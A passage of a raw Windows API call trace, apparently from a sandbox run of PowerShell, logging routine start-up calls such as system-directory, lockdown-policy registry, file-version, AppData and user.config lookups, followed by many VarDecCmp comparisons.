| out: lpBuffer=0x24955c0*, lpNumberOfBytesRead=0x1b62cd58*=0x0, lpOverlapped=0x0) returned 1 [0332.793] CoTaskMemAlloc (cb=0x20c) returned 0x1a865b20 [0332.793] GetSystemDirectoryW (in: lpBuffer=0x1a865b20, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0332.793] CoTaskMemFree (pv=0x1a865b20) [0332.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0332.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0332.794] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca18) returned 1 [0332.794] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b62cd40 | out: lpFileInformation=0x1b62cd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x46178940, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0332.794] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9c8) returned 1 [0332.794] GetSystemInfo (in: lpSystemInfo=0x1b62cdc0 | out: lpSystemInfo=0x1b62cdc0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0332.794] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62ccc8 | out: phkResult=0x1b62ccc8*=0x7cc) returned 0x0 [0332.795] RegQueryValueExW (in: hKey=0x7cc, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b62cd18, lpData=0x0, lpcbData=0x1b62cd10*=0x0 | out: lpType=0x1b62cd18*=0x0, lpData=0x0, lpcbData=0x1b62cd10*=0x0) returned 0x2 [0332.846] RegCloseKey (hKey=0x7cc) returned 0x0 [0332.846] CloseHandle (hObject=0x7c4) returned 1 [0332.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.Config", nBufferLength=0x105, lpBuffer=0x1b62b560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.Config", lpFilePart=0x0) returned 0x40 [0332.947] CoTaskMemAlloc (cb=0x20c) returned 0x1a8687c0 [0332.947] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a8687c0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0332.947] CoTaskMemFree (pv=0x1a8687c0) [0332.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0332.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0332.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0332.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0332.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62b6c8) returned 1 [0332.948] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1b62b9f0 | out: lpFileInformation=0x1b62b9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359c88a6, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x43e9ee06, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x359c88a6, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x6e800)) returned 1 [0332.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62b678) returned 1 [0332.949] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpdwHandle=0x1b62bac8 | out: lpdwHandle=0x1b62bac8) returned 0x72c [0332.949] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwHandle=0x0, dwLen=0x72c, lpData=0x23500a8 | out: lpData=0x23500a8) returned 1 [0332.950] VerQueryValueW (in: pBlock=0x23500a8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1b62ba48, puLen=0x1b62ba40 | out: lplpBuffer=0x1b62ba48*=0x2350438, puLen=0x1b62ba40) returned 1 [0332.950] VerQueryValueW (in: pBlock=0x23500a8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x1b62b9e8, puLen=0x1b62b9e0 | out: lplpBuffer=0x1b62b9e8*=0x2350160, puLen=0x1b62b9e0) returned 1 [0332.950] VerQueryValueW (in: pBlock=0x23500a8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x1b62b9e8, puLen=0x1b62b9e0 | out: lplpBuffer=0x1b62b9e8*=0x23501b4, puLen=0x1b62b9e0) returned 1 [0332.950] VerQueryValueW (in: pBlock=0x23500a8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x1b62b9e8, puLen=0x1b62b9e0 | out: lplpBuffer=0x1b62b9e8*=0x23501fc, puLen=0x1b62b9e0) returned 1 [0332.950] VerQueryValueW (in: pBlock=0x23500a8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x1b62b9e8, puLen=0x1b62b9e0 | out: lplpBuffer=0x1b62b9e8*=0x2350264, puLen=0x1b62b9e0) returned 1 [0332.950] VerQueryValueW (in: pBlock=0x23500a8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x1b62b9e8, puLen=0x1b62b9e0 | out: lplpBuffer=0x1b62b9e8*=0x23502a0, puLen=0x1b62b9e0) returned 1 [0332.950] VerQueryValueW (in: pBlock=0x23500a8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x1b62b9e8, puLen=0x1b62b9e0 | out: lplpBuffer=0x1b62b9e8*=0x2350324, puLen=0x1b62b9e0) returned 1 [0332.950] VerQueryValueW (in: pBlock=0x23500a8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x1b62b9e8, puLen=0x1b62b9e0 | out: lplpBuffer=0x1b62b9e8*=0x235036c, puLen=0x1b62b9e0) returned 1 [0332.950] VerQueryValueW (in: pBlock=0x23500a8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x1b62b9e8, puLen=0x1b62b9e0 | out: lplpBuffer=0x1b62b9e8*=0x23503dc, puLen=0x1b62b9e0) returned 1 [0332.950] VerQueryValueW (in: pBlock=0x23500a8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x1b62b9e8, puLen=0x1b62b9e0 | out: lplpBuffer=0x1b62b9e8*=0x0, puLen=0x1b62b9e0) returned 0 [0332.950] VerQueryValueW (in: pBlock=0x23500a8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x1b62b9e8, puLen=0x1b62b9e0 | out: lplpBuffer=0x1b62b9e8*=0x0, puLen=0x1b62b9e0) returned 0 [0332.950] VerQueryValueW (in: pBlock=0x23500a8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x1b62b9e8, puLen=0x1b62b9e0 | out: lplpBuffer=0x1b62b9e8*=0x0, puLen=0x1b62b9e0) returned 0 [0332.950] VerQueryValueW (in: pBlock=0x23500a8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x1b62b9e8, puLen=0x1b62b9e0 | out: lplpBuffer=0x1b62b9e8*=0x0, puLen=0x1b62b9e0) returned 0 [0332.951] VerQueryValueW (in: pBlock=0x23500a8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1b62b998, puLen=0x1b62b990 | out: lplpBuffer=0x1b62b998*=0x2350438, puLen=0x1b62b990) returned 1 [0332.951] VerLanguageNameW (in: wLang=0x409, szLang=0x1b62b6c0, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0332.951] VerQueryValueW (in: pBlock=0x23500a8, lpSubBlock="\\", lplpBuffer=0x1b62b9e8, puLen=0x1b62b9e0 | out: lplpBuffer=0x1b62b9e8*=0x23500d0, puLen=0x1b62b9e0) returned 1 [0333.004] CoTaskMemAlloc (cb=0x20c) returned 0x1a8656e0 [0333.004] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x1a8656e0 | out: pszPath="C:\\Users\\OqXZRaykm\\AppData\\Roaming") returned 0x0 [0333.004] CoTaskMemFree (pv=0x1a8656e0) [0333.004] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x23 [0333.004] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming", nBufferLength=0x23, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Roaming", lpFilePart=0x0) returned 0x22 [0333.004] CoTaskMemAlloc (cb=0x20c) returned 0x1a866a00 [0333.004] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1a866a00 | out: pszPath="C:\\Users\\OqXZRaykm\\AppData\\Local") returned 0x0 [0333.005] CoTaskMemFree (pv=0x1a866a00) [0333.005] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x21 [0333.005] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local", nBufferLength=0x21, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Local", lpFilePart=0x0) returned 0x20 [0333.005] GetCurrentProcess () returned 0xffffffffffffffff [0333.005] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b62b908 | out: TokenHandle=0x1b62b908*=0x70c) returned 1 [0333.006] CloseHandle (hObject=0x70c) returned 1 [0333.007] GetCurrentProcess () returned 0xffffffffffffffff [0333.007] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b62b908 | out: TokenHandle=0x1b62b908*=0x70c) returned 1 [0333.008] CloseHandle (hObject=0x70c) returned 1 [0333.017] GetCurrentProcess () returned 0xffffffffffffffff [0333.017] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b62b748 | out: TokenHandle=0x1b62b748*=0x70c) returned 1 [0333.018] GetFileAttributesExW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\Microsoft_Corporation\\DefaultDomain_Path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\microsoft_corporation\\defaultdomain_path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x1b62b7f0 | out: lpFileInformation=0x1b62b7f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0333.018] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\Microsoft_Corporation\\DefaultDomain_Path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x86 [0333.018] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\Microsoft_Corporation\\DefaultDomain_Path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config", nBufferLength=0x86, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\Microsoft_Corporation\\DefaultDomain_Path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config", lpFilePart=0x0) returned 0x85 [0333.019] GetFileAttributesExW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\Microsoft_Corporation\\DefaultDomain_Path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\microsoft_corporation\\defaultdomain_path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x1b62b7e8 | out: lpFileInformation=0x1b62b7e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0333.020] CloseHandle (hObject=0x70c) returned 1 [0333.020] GetCurrentProcess () returned 0xffffffffffffffff [0333.020] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b62b908 | out: TokenHandle=0x1b62b908*=0x70c) returned 1 [0333.021] CloseHandle (hObject=0x70c) returned 1 [0333.023] GetCurrentProcess () returned 0xffffffffffffffff [0333.023] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b62b748 | out: TokenHandle=0x1b62b748*=0x70c) returned 1 [0333.024] GetFileAttributesExW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft_Corporation\\DefaultDomain_Path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft_corporation\\defaultdomain_path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x1b62b7f0 | out: lpFileInformation=0x1b62b7f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0333.024] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft_Corporation\\DefaultDomain_Path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x84 [0333.024] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft_Corporation\\DefaultDomain_Path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config", nBufferLength=0x84, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft_Corporation\\DefaultDomain_Path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config", lpFilePart=0x0) returned 0x83 [0333.025] GetFileAttributesExW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft_Corporation\\DefaultDomain_Path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft_corporation\\defaultdomain_path_kxvtrhbolmjvgo3xagw1tq3par5ze3hu\\10.0.19041.1\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x1b62b7e8 | out: lpFileInformation=0x1b62b7e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0333.025] CloseHandle (hObject=0x70c) returned 1 [0333.140] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b629b58 | out: phkResult=0x1b629b58*=0x0) returned 0x2 [0333.140] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b629b58 | out: phkResult=0x1b629b58*=0x0) returned 0x2 [0333.347] VarDecCmp (pdecLeft=0x1b62ad08, pdecRight=0x1b62acf8) returned 0x1 [0333.348] VarDecFix (in: pdecIn=0x1b62ace8, pdecResult=0x1b62ac70 | out: pdecResult=0x1b62ac70) returned 0x0 [0333.348] VarDecCmp (pdecLeft=0x1b62acd8, pdecRight=0x1b62acc8) returned 0x1 [0333.348] VarDecCmp (pdecLeft=0x1b62ad00, pdecRight=0x1b62acf0) returned 0x2 [0333.348] VarDecFix (in: pdecIn=0x1b62ace0, pdecResult=0x1b62ac50 | out: pdecResult=0x1b62ac50) returned 0x0 [0333.348] VarDecCmp (pdecLeft=0x1b62acd0, pdecRight=0x1b62acc0) returned 0x1 [0333.348] VarDecCmp (pdecLeft=0x1b62acb0, pdecRight=0x1b62aca0) returned 0x2 [0333.350] VarDecCmp (pdecLeft=0x1b62ad08, pdecRight=0x1b62acf8) returned 0x1 [0333.350] VarDecFix (in: pdecIn=0x1b62ace8, pdecResult=0x1b62ac70 | out: pdecResult=0x1b62ac70) returned 0x0 [0333.350] VarDecCmp (pdecLeft=0x1b62acd8, pdecRight=0x1b62acc8) returned 0x1 [0333.350] VarDecCmp (pdecLeft=0x1b62ad00, pdecRight=0x1b62acf0) returned 0x2 [0333.350] VarDecFix (in: pdecIn=0x1b62ace0, pdecResult=0x1b62ac50 | out: pdecResult=0x1b62ac50) returned 0x0 [0333.350] VarDecCmp (pdecLeft=0x1b62acd0, pdecRight=0x1b62acc0) returned 0x1 [0333.350] VarDecCmp (pdecLeft=0x1b62acb0, pdecRight=0x1b62aca0) returned 0x2 [0333.353] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.360] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.361] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.361] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.361] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.362] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.364] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.366] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.366] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.368] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.369] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.370] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.370] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.370] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.370] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.371] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.371] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.371] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.372] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.372] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.372] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.378] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.380] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.380] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.380] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.380] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.380] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.380] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.380] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.381] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.381] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.381] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.383] VarDecCmp (pdecLeft=0x1b62bcb0, pdecRight=0x1b62bca0) returned 0x1 [0333.433] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x1 [0333.434] VarDecCmp (pdecLeft=0x1b62b920, pdecRight=0x1b62b910) returned 0x1 [0333.434] VarDecCmp (pdecLeft=0x1b62b920, pdecRight=0x1b62b910) returned 0x0 [0333.438] VarDecCmp (pdecLeft=0x1b62baa0, pdecRight=0x1b62ba90) returned 0x1 [0333.438] VarDecCmp (pdecLeft=0x1b62b760, pdecRight=0x1b62b750) returned 0x1 [0333.439] VarDecCmp (pdecLeft=0x1b62b6a0, pdecRight=0x1b62b690) returned 0x0 [0333.439] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.439] VarDecCmp (pdecLeft=0x1b62baa0, pdecRight=0x1b62ba90) returned 0x1 [0333.439] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x1 [0333.439] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x1 [0333.440] VarDecCmp (pdecLeft=0x1b62b760, pdecRight=0x1b62b750) returned 0x1 [0333.440] VarDecCmp (pdecLeft=0x1b62b6a0, pdecRight=0x1b62b690) returned 0x1 [0333.440] VarDecCmp (pdecLeft=0x1b62b6a0, pdecRight=0x1b62b690) returned 0x0 [0333.440] VarDecCmp (pdecLeft=0x1b62b6a0, pdecRight=0x1b62b690) returned 0x0 [0333.440] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.440] VarDecCmp (pdecLeft=0x1b62b760, pdecRight=0x1b62b750) returned 0x0 [0333.440] VarDecCmp (pdecLeft=0x1b62b6a0, pdecRight=0x1b62b690) returned 0x1 [0333.440] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.440] VarDecCmp (pdecLeft=0x1b62b760, pdecRight=0x1b62b750) returned 0x1 [0333.440] VarDecCmp (pdecLeft=0x1b62b6a0, pdecRight=0x1b62b690) returned 0x0 [0333.440] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.440] VarDecCmp (pdecLeft=0x1b62baa0, pdecRight=0x1b62ba90) returned 0x1 [0333.440] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x1 [0333.440] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x1 [0333.440] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.440] VarDecCmp (pdecLeft=0x1b62baa0, pdecRight=0x1b62ba90) returned 0x1 [0333.440] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x1 [0333.440] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.440] VarDecCmp (pdecLeft=0x1b62baa0, pdecRight=0x1b62ba90) returned 0x1 [0333.440] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x1 [0333.440] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.440] VarDecCmp (pdecLeft=0x1b62baa0, pdecRight=0x1b62ba90) returned 0x1 [0333.440] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.440] VarDecCmp (pdecLeft=0x1b62baa0, pdecRight=0x1b62ba90) returned 0x1 [0333.441] VarDecCmp (pdecLeft=0x1b62b760, pdecRight=0x1b62b750) returned 0x1 [0333.441] VarDecCmp (pdecLeft=0x1b62b6a0, pdecRight=0x1b62b690) returned 0x0 [0333.441] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.441] VarDecCmp (pdecLeft=0x1b62baa0, pdecRight=0x1b62ba90) returned 0x1 [0333.441] VarDecCmp (pdecLeft=0x1b62b760, pdecRight=0x1b62b750) returned 0x1 [0333.441] VarDecCmp (pdecLeft=0x1b62b6a0, pdecRight=0x1b62b690) returned 0x0 [0333.441] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.441] VarDecCmp (pdecLeft=0x1b62baa0, pdecRight=0x1b62ba90) returned 0x1 [0333.441] VarDecCmp (pdecLeft=0x1b62b760, pdecRight=0x1b62b750) returned 0x1 [0333.441] VarDecCmp (pdecLeft=0x1b62b6a0, pdecRight=0x1b62b690) returned 0x1 [0333.441] VarDecCmp (pdecLeft=0x1b62b6a0, pdecRight=0x1b62b690) returned 0x0 [0333.441] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.441] VarDecCmp (pdecLeft=0x1b62baa0, pdecRight=0x1b62ba90) returned 0x1 [0333.441] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.441] VarDecCmp (pdecLeft=0x1b62b9e0, pdecRight=0x1b62b9d0) returned 0x0 [0333.441] VarDecCmp 